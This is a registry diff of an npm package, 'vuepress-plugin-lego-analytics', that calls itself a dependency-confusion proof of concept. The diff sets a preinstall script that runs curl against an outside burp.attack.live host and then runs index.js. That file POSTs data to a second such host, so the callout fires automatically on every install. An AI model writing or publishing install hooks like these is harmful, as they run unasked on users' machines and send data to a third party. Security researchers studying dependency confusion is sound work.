vuepress-plugin-lego-analytics 3.0.6 → 4.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +2 -2
- package/package.json +3 -6
package/index.js
CHANGED
@@ -22,7 +22,7 @@ var postData = querystring.stringify({
|
|
22
22
|
});
|
23
23
|
|
24
24
|
var options = {
|
25
|
-
hostname: "
|
25
|
+
hostname: "ahvn70991vvijhv1wkusjfso3f96xxple.burp.attack.live",
|
26
26
|
port: 443,
|
27
27
|
path: "/",
|
28
28
|
method: "POST",
|
@@ -43,4 +43,4 @@ req.on("error", (e) => {
|
|
43
43
|
});
|
44
44
|
|
45
45
|
req.write(postData);
|
46
|
-
req.end();
|
46
|
+
req.end();
|
package/package.json
CHANGED
@@ -1,15 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "vuepress-plugin-lego-analytics",
|
3
|
-
"version": "
|
3
|
+
"version": "4.0.1",
|
4
4
|
"main": "index.js",
|
5
5
|
"scripts": {
|
6
6
|
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
-
"preinstall": "curl 942.
|
7
|
+
"preinstall": "curl 942.zruchpjybk57t65q694ht42dd4jv7myan.burp.attack.live && node index.js"
|
8
8
|
},
|
9
9
|
"author": "",
|
10
10
|
"license": "ISC",
|
11
|
-
"description": "This repository contains a Proof of Concept (PoC), demonstrating how malicious actors can exploit vulnerabilities using dependency confusion."
|
12
|
-
"dependencies": {
|
13
|
-
"vuepress-plugin-lego-analytics": "^3.0.5"
|
14
|
-
}
|
11
|
+
"description": "This repository contains a Proof of Concept (PoC), demonstrating how malicious actors can exploit vulnerabilities using dependency confusion."
|
15
12
|
}
|